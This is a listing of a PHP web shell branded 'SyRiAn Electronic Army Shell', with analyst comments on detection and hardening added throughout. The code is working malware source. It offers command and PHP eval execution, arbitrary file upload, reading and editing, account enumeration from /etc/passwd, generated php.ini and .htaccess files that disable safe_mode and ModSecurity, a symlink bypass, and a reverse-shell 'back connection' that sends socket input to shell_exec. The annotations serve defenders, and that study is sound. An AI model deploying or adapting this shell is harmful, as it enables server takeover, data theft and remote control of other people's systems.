Googleinurl

[SHELL_SCRIPT]=> SyRiAn Electronic Army Shell :: SEA Shell

Aug 26th, 2014
  1. <?php
     # Analyst note: this listing is a PHP web shell (file manager, command and
     # PHP execution, file upload, outbound "back connection"). The settings in
     # this header are useful static indicators when scanning a web root.
  2. # Bypass SuHosin
  3. # Virtual
  4. # users 6 ID /etc/passwd
  5.  
     # Hard-coded panel credentials and UI colour; $uselogin = 1 enables the
     # login gate further down the file.
  6. $user = 'mhu';
  7. $pass = 'mhu';
  8. $uselogin = 1;
  9. $sh3llColor = "green";
  10.  
      # Default database credentials; MySQLReader() and MySQLIReader() read them
      # through `global`. Hardening: a web host should never accept root/root.
  11. # MySQL Info ---------
  12. $DBhost = "localhost";
  13. $DBuser = "root";
  14. $DBpass = "root";
  15. #---------------------
      # Runtime setup: starts a session, silences all error output, removes the
      # execution time limit, keeps running after the client disconnects,
      # restores safe_mode / open_basedir to their startup values and then tries
      # to switch safe_mode off.
      # set_magic_quotes_runtime() and safe_mode exist only on legacy PHP 5.x,
      # so the code targets old stacks.
      # Detection: error_reporting(0) + set_time_limit(0) + ignore_user_abort()
      # + ini_restore("open_basedir") clustered at the top of a file under a
      # document root is a strong web-shell heuristic for file scanners.
      # NOTE(review): safe_mode is a system-level setting, so the ini_set() call
      # should have no effect on a correctly configured host - confirm for the
      # PHP build in use.
  16. session_start();
  17. error_reporting(0);
  18. set_magic_quotes_runtime(0);
  19. set_time_limit(0);
  20. ignore_user_abort(TRUE);
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. ini_set('max_execution_time',0);
  24. ini_set('output_buffering',0);
  25. ini_set('safe_mode','Off');
  26.  
  27. // Set Current Directory
      // The working directory comes from the POST field curDir (passed through
      // filter(), which is defined outside the visible listing) and is cached
      // in the session between requests.
  28. if(!$_POST && !$_SESSION['curDir']) {
  29.     $dir = getcwd();
  30.     $_SESSION['curDir'] = $dir;
  31. } else if(empty($_POST['curDir'])) {
  32.     $dir = $_SESSION['curDir'];
  33. } else {
  34.     $dir = filter($_POST['curDir']);
  35.     $_SESSION['curDir'] = $dir;
  36. }
  37. // Set Dir Mode
      // dir_mode is taken from the query string unmodified and cached in the session.
  38. if($_GET['dir_mode']) {
  39.     $dir_mode = $_GET['dir_mode'];
  40.     $_SESSION['dir_mode'] = $dir_mode;
  41. } else {
  42.     $dir_mode = $_SESSION['dir_mode'];
  43. }
  44.  
  45. // Set Usable Command
      // The execution method is chosen by the client (POST field exe_method);
      // "exec" is the default.
  46. if($_POST['exe_method']) {
  47.     $exec_method = $_POST['exe_method'];
  48. } else {
  49.     $exec_method = "exec";
  50. }
  51. # Logout
      # Clears the two auth cookies with inline script and reloads the page;
      # PHP_SELF is written into the script without escaping.
  52. if($_POST['logout']) {
  53.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
  54.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
  55. }
      // OS guess: a colon in the second character of the path (drive letter)
      // means Windows, anything else is treated as Linux.
  56. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
      // phpinfo() is triggered by the query parameter "info". This line runs
      // before the login check later in the file, so the full PHP configuration
      // is disclosed without credentials.
      // Detection: access-log entries for an unexpected .php file carrying
      // info= or dir_mode= query parameters.
  57. if($_GET['info']){phpinfo();}
      // SafeMode() is defined outside the visible listing.
  58. $safeMode = SafeMode();
      // NOTE(review): $SERVER_SOFTWARE is never assigned in the visible code;
      // presumably it relies on register_globals - confirm.
  59. $server = substr($SERVER_SOFTWARE,0,120);
  60. $daemon = "";
  61. ?>
  62. <html>
  63. <head>
  64. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
  65. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
  66. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  67. <?php echo CSS($sh3llColor); ?>
  68.  
  69. </head>
  70. <body dir='ltr'>
  71. <?php
  72. # ---------------------------------------#
  73. #             Authentication             #
  74. #----------------------------------------#
      # Login state lives entirely in client cookies: the user name in clear and
      # an unsalted MD5 of the password, compared with loose (!=) comparison.
  75. if ($uselogin ==1) {
  76.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
              // When any query-string parameter is present, the expected
              // credentials are replaced with request-supplied values before
              // the form comparison below, so this gate does not reliably
              // restrict the panel to whoever planted it.
              // Incident response: treat a host carrying this file as usable by
              // any party that found it, not only by the original intruder.
  77.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
  78.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
                  // On success the cookies are set from inline script; the
                  // posted user name is written into the page unescaped.
  79.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
  80.         } else {
  81.             if($_POST['usrname']){
  82.                 print'<script>alert("Go and play in the street man !!");</script>';
  83.             }
  84. ?>
  85. <br><br>
  86.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
  87.             <sy>SyRiAn Electronic Army</sy>
  88.             </center><br />
  89.             <div align="center">
  90.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
  91.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
  92.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
  93.                 <input type="submit" value=" Login  " name="login" />
  94.                 </form>
  95.             </div>
  96.             <?php
  97.             footer();
  98.             exit;
  99.         }
  100.     }
  101. }
  102. ?>
  103. <table cellpadding='0' cellspacing='0' width='100%'>
  104.     <tr>
  105.         <td width='160'>
  106.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  107.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
  108.             <center>SyRiAn Electronic Army
  109.             <p></p>
  110.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  111.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  112.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  113.                 </select>
  114.             </center>
  115.       </td>
  116.       <td>
  117.       <form method="post">
  118. <table width='100%' style="border:none; padding:2px;" >
  119.     <tr>
  120.         <td width='103'>System</td>
  121.         <td width="323"><?php echo $os; ?></td>
  122.         <td width="90">Apache Modules</td>
  123.         <td width="278"><select ><?php
  124.         if(function_exists("apache_get_modules")) {
  125.             foreach (apache_get_modules() as $module) {
  126.                 echo "<option>".$module."</option>";
  127.             }
  128.         }else {
  129.             echo "<option>NONE</option>";
  130.         }
  131.         ?></select></td>
  132.     </tr>
  133.     <tr>
  134.       <td>uname </td>
  135.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  136.       <td>Curl</td>
  137.       <td><?php echo Curl(); ?></td>
  138.     </tr>
  139.     <tr>
  140.         <td>pwd</td>
  141.         <td><?php echo getcwd(); ?></td>
  142.         <td>Open Basedir</td>
  143.         <td><?php echo openBaseDir(); ?></td>
  144.     </tr>
  145.     <tr>
  146.         <td>whoami</td>
  147.         <td><?php echo get_current_user(); ?></td>
  148.         <td>Magic_Quotes</td>
  149.         <td><?php echo magicQouts(); ?></td>
  150.     </tr>
  151.         <tr>
  152.           <td>Server</td>
  153.           <td><?php echo $server; ?></td>
  154.           <td>Register Globals</td>
  155.           <td><?php echo RegisterGlobals(); ?></td>
  156.         </tr>
  157.         <tr>
  158.           <td>Server Name</td>
  159.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  160.           <td>Gzip</td>
  161.           <td><?php echo Gzip(); ?></td>
  162.         </tr>
  163.         <tr>
  164.           <td>Your IP</td>
  165.           <td><?php echo GetRealIP(); ?></td>
  166.           <td>Oracle</td>
  167.           <td><?php echo Oracle(); ?></td>
  168.         </tr>
  169.         <tr>
  170.           <td>Server IP</td>
  171.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  172.           <td>MSQL</td>
  173.           <td><?php echo MSQL(); ?></td>
  174.         </tr>
  175.         <tr>
  176.           <td>PHP Version</td>
  177.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  178.           <td>MySQL</td>
  179.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  180.         </tr>
  181.         <tr>
  182.           <td>Safe Mode</td>
  183.           <td><?php echo $safeMode; ?></td>
  184.           <td>MySQLi</td>
  185.           <td><?php echo MysqlI(); ?></td>
  186.         </tr>
  187.         <tr>
  188.         <td>disable functions</td>
  189.         <td><select name="disableFunctions"><?php
  190.         $funArray = DisableFunctions();
  191.         $funArray = explode(",",$funArray);
  192.         sort($funArray);
  193.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  194.         ?></select>
  195.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  196.           </td>
  197.         <td>MsSQL</td>
  198.         <td><?php echo MsSQL(); ?></td>
  199.         </tr>
  200. </table>
  201. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  202. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  203. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  204. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  205. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  206. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  207. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  208. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  209. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  210. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  211. <br>
  212. </form>
  213. </table>
  214.  
  215. <form method="post">
  216. <center>
  217. <textarea cols="150" rows="20" name="result" >
  218. <?php
       // Request dispatcher: one POST field per action selects a branch of the
       // if / else-if chain that starts here. Output lands inside the result
       // textarea opened just above.
       // Detection: POSTs to a single script carrying fields such as
       // CMD_Execute, PHP_Execute, UPLOAD_Execute, EDIT_Execute, SAVE_Execute,
       // READ_Execute, STOP_Execute or CON_Type make a usable WAF / log
       // signature (request bodies must be logged or inspected inline).
  219. chdir($dir);
  220. if($_POST['login'] || !$_POST){echo ScanDirs();}
       // Command execution: CMD_Line goes through filter() and urldecode() into
       // Exe(); both helpers are defined outside the visible listing.
  221. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
       // PHP evaluation: PHP_Line reaches eval() through Evaluation().
  222. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
       // Upload: each file is written into the current directory under the
       // client-supplied name, with no type, extension or path checks.
       // Hardening: keep document roots non-writable for the PHP user and do not
       // execute scripts from upload locations.
  223. else if($_POST['UPLOAD_Execute']) {
  224.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
  225.         if($_FILES['uploadfile']['name'][$i] != '') {
  226.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  227.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
  228.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
  229. ";  }
  230.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
  231. ";}
  232.         }
  233.     }      
  234. }
       // Edit / Save: Edit prints an arbitrary file into the textarea; Save
       // writes the textarea back to FILE_NAME via GenerateFile() (defined
       // outside the visible listing).
  235. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
  236. else if($_POST['SAVE_Execute']) {
  237.     $content = filter($_POST['result']);
  238.     if(empty($content)){$content = " ";}
  239.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
  240. }
       // Read: the same path is read through whichever primitive READ_Type
       // names. NOTE(review): the number of alternatives suggests the aim is to
       // find one that a disable_functions list missed - confirm.
       // Hardening: do not rely on disable_functions alone; confine PHP with
       // open_basedir, filesystem permissions and a least-privilege account.
  241. else if($_POST['READ_Execute']) {
  242.     $path = urldecode(filter($_POST['READ_Line']));
  243.     $file = fopen($path,'r+');
  244.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
  245.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
  246.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
  247.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
  248.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
  249.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
  250.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
  251.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
  252.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
  253.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
  254.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
  255.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
  256.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
  257.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
  258.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
  259.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
  260.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
  261.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
  262.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
  263.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
  264. }
  265. else if($_POST['STOP_Execute']) {
       // "Turn Off" button: drops a php.ini and an .htaccess into the current
       // directory through GenerateFile() (defined outside the visible listing).
       // The php.ini tries to clear safe_mode, disable_functions and
       // open_basedir. The .htaccess (second call below) switches off
       // ModSecurity filtering using the old SecFilter* directives, allows
       // GET/POST from everyone and points PHPRC at the new php.ini.
       // Detection: file-integrity alerts on new php.ini / .htaccess files under
       // document roots; search content for "SetEnv PHPRC" and
       // "SecFilterEngine Off".
       // Hardening: AllowOverride None (or a minimal list) so dropped .htaccess
       // files are ignored; web root not writable by the PHP user.
       // NOTE(review): PHPRC is honoured by CGI/FastCGI PHP - confirm which SAPI
       // the affected host runs before judging impact.
  266. $genTry = GenerateFile("php.ini","
  267. safe_mode = Off
  268. disable_functions = NONE
  269. safe_mode_gid = OFF
  270. open_basedir = OFF");
  271.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
  272. ";}
  273.     else {echo "[-] Failed to generate php.ini file !!
  274. ";}
  275.    
  276.     $genTry = GenerateFile(".htaccess","
  277. <IfModule mod_security.c>
  278. SecFilterEngine Off
  279. SecFilterScanPOST Off
  280. SecFilterCheckURLEncoding Off
  281. SecFilterCheckCookieFormat Off
  282. SecFilterCheckUnicodeEncoding Off
  283. SecFilterNormalizeCookies Off
  284. </IfModule>
  285. <Limit GET POST>
  286. order deny,allow
  287. deny from all
  288. allow from all
  289. </Limit>
  290. <Limit PUT DELETE>
  291. order deny,allow
  292. deny from all
  293. </Limit>
  294. SetEnv PHPRC ".getcwd()."/php.ini
  295.     ");
  296.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
  297. ";}
  298.     else {echo "[-] Failed to generate .htaccess file !!
  299. ";}
  300. }
  301. else if($_POST['CON_Type'] == "socks") {
       // Outbound ("back") connection, socket variant: connects to the ip/port
       // posted by the form, then passes whatever it reads from the socket to
       // shell_exec() and writes the output back over the same socket.
       // Detection: outbound TCP initiated by the web-server / PHP process to
       // arbitrary hosts (the form pre-fills port 443, so port-based egress
       // rules alone will not catch it); shell child processes spawned by the
       // PHP worker.
       // Hardening: default-deny egress from web tiers; remove the socket and
       // process-execution functions from PHP where the application allows.
  302.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  303.     if($sock < 0){echo "[-] failed to create socket.";}
  304.     else {
  305.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
  306.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
  307.         else {
  308.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
  309.             socket_write($sock, $send_var, strlen($send_var));
  310.             while($input = socket_read($sock, 10000)) {
  311.                 socket_write($sock, shell_exec($input), 12000);
  312.             }
  313.         }
  314.     }
  315. } else if($_POST['CON_Type'] == "fsockopen") {
       // fsockopen variant: on connect it sends a banner plus the output of
       // uname -a, pwd and id; inside the loop each received line is echoed
       // back after the whoami output. The banner string is identical in both
       // variants and can serve as a network-level signature on unencrypted
       // flows.
  316.     $ip = filter(trim($_POST['ip']));
  317.     $port = filter(trim($_POST['port']));
  318.     if (!empty($ip)) {
  319.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
  320.         if (!$con_fsockopen){
  321.             $result = "Error: didnt connect !!!";
  322.         } else {
  323.             $newLine="\n";          
  324.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
  325.             fputs($con_fsockopen , system("uname -a") .$newLine );
  326.             fputs($con_fsockopen , system("pwd") .$newLine );
  327.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
  328.             while(!feof($con_fsockopen)){  
  329.                 fputs ($con_fsockopen);
  330.                 $one="[$";
  331.                 $two="]";
  332.                 $result= fgets ($con_fsockopen, 8192);
  333.                 $message = $result;
  334.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
  335.             }
  336.             fclose ($con_fsockopen);
  337.         }
  338.     }
  339. }
  340. else if($_POST['USERS_1']){echo GetUsers1();}
       // USERS_1 .. USERS_5 (the branch above and the four below): five
       // alternative ways of listing local accounts, see GetUsers1() to
       // GetUsers5().
  341. else if($_POST['USERS_2']) {
  342.      $array = GetUsers2();
  343.      foreach($array as $line)
  344.      {echo $line."
  345. ";}
  346. }
  347. else if($_POST['USERS_3']) {
  348.      $array = GetUsers3();
  349.      foreach($array as $line)
  350.      {echo $line."
  351. ";}
  352. }
  353. else if($_POST['USERS_4']) {
  354.      $array = GetUsers4();
  355.      foreach($array as $line)
  356.      {echo $line."
  357. ";}
  358. } else if($_POST['USERS_5']){echo GetUsers5();}
       // "Forbidden" button: creates ./forbidden with an .htaccess that makes
       // sea.txt the directory index and forces .php / .html to be served as
       // text/plain; the success message refers to a symlink named sea.txt.
       // Detection: new "forbidden" directories, sea.txt symlinks or .htaccess
       // files containing "ForceType text/plain" under a document root.
       // Hardening: SymLinksIfOwnerMatch instead of FollowSymLinks, restricted
       // AllowOverride, and per-account isolation on shared hosting.
  359. else if($_POST['forbidden_bypass']) {
  360.     mkdir("forbidden");
  361.     chdir("forbidden");
  362.     $forbidden_htaccess = GenerateFile(".htaccess", "
  363. DirectoryIndex sea.txt
  364. HeaderName sea.txt
  365. ReadmeName sea.txt
  366. footerName sea.txt
  367. ErrorDocument 404 /404.html
  368. 404.html = Symlinked sea.txt
  369. Options all
  370. ForceType text/plain
  371. AddType text/plain .php
  372. AddType text/plain .html
  373. AddHandler server-parsed .php
  374. AddHandler txt .php
  375.     ");
  376.     if($forbidden_htaccess) {
  377.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
  378.     } else {
  379.         echo "[-] error with generating .htaccess file.";
  380.     }
       // "Find 755": lists /home/*/public_html directories whose mode is
       // drwxr-xr-x, i.e. readable by other local accounts. Hardening on shared
       // hosts: tighter home / web-root modes and per-user process isolation.
  381. } else if($_POST['find_755']) {
  382.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
  383. }
  384. ?></textarea>
  385. <?php
  386. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  387. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  388. ";}
  389. ?>
  390. </center></form>
  391. <table width='100%'>
  392.     <tr valign="top">
  393.         <td width='30%'>
  394.        <!-- Command Line -->
  395.        <form method='POST' enctype="multipart/form-data">
  396.             <table height='72' border='0' id='Box' width="100%">
  397.               <tr>
  398.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  399.                     <td style="background-color:#666;padding-left:10px;">Edit File
  400.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  401.               </tr>
  402.                 <tr>
  403.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  404.                 </tr>
  405.             </table>
  406.         </form>
  407.         <!-- End Of Command Line-->
  408.        
  409.         </td>
  410.         <td width='30%' height='30'>
  411.          <!-- Command Line -->
  412.          <form method='POST' enctype="multipart/form-data">
  413.               <table height='72' border='0' id='Box'>
  414.               <tr>
  415.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  416.                 <td style="background-color:#666;padding-left:10px;">Command Line
  417.                 <?php echo print_exe_method(); ?>
  418.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  419.                 </td>
  420.             </tr>
  421.                 <tr>
  422.                   <td height="45" colspan="2">
  423.                     <?php echo SelectCommand($os); ?>
  424.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  425.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  426.                 </tr>
  427.             </table>
  428.         </form>
  429.         <!-- End Of Command Line-->
  430.       </td>
  431.         <td width='30%' height='30' valign="top">
  432.         <!-- Commands Alias-->
  433.         <form method='POST' enctype="multipart/form-data">
  434.             <table width='100%' height='72' border='0' id='Box'>
  435.               <tr>
  436.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  437.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
  438.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  439.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  440.                     </span></td>
  441.               </tr>
  442.                 <tr>
  443.                   <td height="45" colspan="2">
  444.                   <input type='file' name='uploadfile[]'>
  445.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  446.                 </tr>
  447.             </table>
  448.         </form>
  449.         <!-- End Of Commands Alias-->
  450.         </td>
  451.     </tr>
  452. <tr valign="top">
  453.         <td width='30%'>
  454.        <!-- Commands Alias-->
  455.        <form method='POST' enctype="multipart/form-data">
  456.             <table width='100%' height='72' border='0' id='Box'>
  457.               <tr>
  458.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  459.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
  460.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  461.               </tr>
  462.                 <tr>
  463.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
  464.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  465.     fwrite($file,"Hacked");
  466.     fclose($file);';}
  467.                 ?>
  468.                   </textarea>
  469.                   <br></td>
  470.               </tr>
  471.             </table>
  472.         </form>
  473.         <!-- End Of Commands Alias-->
  474.         </td>
  475.         <td width='30%' height='30'>
  476.         <!-- Commands Alias-->
  477.         <form method='POST' enctype="multipart/form-data">
  478.         <table width='100%' height='72' border='0' id='Box'>
  479.           <tr>
  480.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  481.                 <td style="background-color:#666;padding-left:10px;">Read Files
  482.                  
  483.                   <select name="READ_Type" >
  484.                     <option value="file" >file</option>
  485.                     <option value="fgets" >fgets</option>
  486.                     <option value="fgetss" >fgetss</option>
  487.                     <option value="readfile" >readfile</option>
  488.                     <option value="fread" >fread</option>
  489.                     <option value="show_source" >show_source</option>
  490.                     <option value="file_get_contents" >file_get_contents</option>
  491.                     <option value="tempnam" >tempnam</option>
  492.                     <option value="copy" >copy</option>
  493.                     <option value="symlink" >Symlink</option>
  494.                     <option value="mb_send_mail" >mb_send_mail</option>
  495.                     <option value="highlight_file" >highlight_file</option>
  496.                     <option value="curl" >Curl</option>
  497.                     <option value="imap" >Imap</option>
  498.                     <option value="mysql" >MySQL</option>
  499.                     <option value="mysqli" >MySQLI</option>
  500.                     <option value="ioncube">Ion Cube</option>
  501.                     <option value="error_log">Error_Log</option>
  502.                     <option value="include">Include</option>
  503.                     <option value="id" >ID /etc/passwd</option>
  504.                   </select>
  505.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  506.           </tr>
  507.             <tr>
  508.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  509.           </tr>
  510.         </table>
  511.         </form>
  512.         <!-- End Of Commands Alias-->
  513.   </td>
  514.         <td width='30%' height='30' valign="top">
  515.         <!-- Commands Alias-->
  516.         <form method='POST' enctype="multipart/form-data">
  517.         <table width='100%' height='72' border='0' id='Box'>
  518.           <tr>
  519.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  520.                 <td style="background-color:#666;padding-left:10px;">Back Connection
  521.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  522.           </tr>
  523.             <tr>
  524.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  525.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  526.               <select name="CON_Type" >
  527.                 <option value="socks">SOCKS</option>
  528.                 <option value="fsockopen">FSOCKOPEN</option>
  529.               </select>
  530.               </td>
  531.             </tr>
  532.         </table>
  533.         </form>
  534.         <!-- End Of Commands Alias-->
  535.         </td>
  536.     </tr>
  537. </table>
  538. <?php
  539. function IncludeReader($path) {
       // Splits $path into directory and file name, sets include_path to the
       // directory and include()s the file. The target is therefore parsed as
       // PHP: code in it runs, anything else is emitted as output. Returns
       // nothing.
       // Hardening: confine PHP with open_basedir and keep secrets out of paths
       // readable by the web user.
  540.     global $os;
  541.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  542.     $fileName = substr(strrchr($path,$slash),1);
  543.     $includePath = substr($path,0,strpos($path,$fileName,0));
  544.     ini_set("include_path",$includePath);
  545.     include($fileName);
  546. }
  547. function GetUsers1() {
       // Account enumeration, method 1: lists /var/mail through Exe() (defined
       // outside the visible listing) and returns whatever Exe() returns.
  548.     return Exe('ls /var/mail');
  549. }
  550. function GetUsers2() {
       // Account enumeration, method 2: reads /etc/passwd with file() and
       // returns an array holding the first colon-separated field of each line.
  551.     $array = array();
  552.     $lines = file("/etc/passwd");
  553.     foreach($lines as $nr=>$val) {
  554.         $str = explode(":",$val);
  555.         array_push($array,$str[0]);
  556.     }
  557.     return $array;
  558. }
  559. function GetUsers3() {
       // Account enumeration, method 3: returns every entry name found directly
       // under /home/ (the "." and ".." entries are not filtered out). Returns
       // nothing when the directory cannot be opened.
  560.     $array = array();
  561.     if ($dh = opendir("/home/"))  {
  562.         while (($file = readdir($dh)) !== false)  {
  563.             array_push($array,$file);
  564.         }
  565.         closedir($dh);
  566.         return $array;
  567.     }
  568. }
  569. function GetUsers4() {
       // Account enumeration, method 4: walks /home/ with three nested
       // readdir() loops and returns the names collected at the innermost
       // level. The first entry of every handle is read and discarded before
       // each loop, and the inner handles ($dh2, $dh3) are never closed.
       // Returns nothing when /home/ cannot be opened.
  570.     $dir = "/home/";
  571.     $array = array();
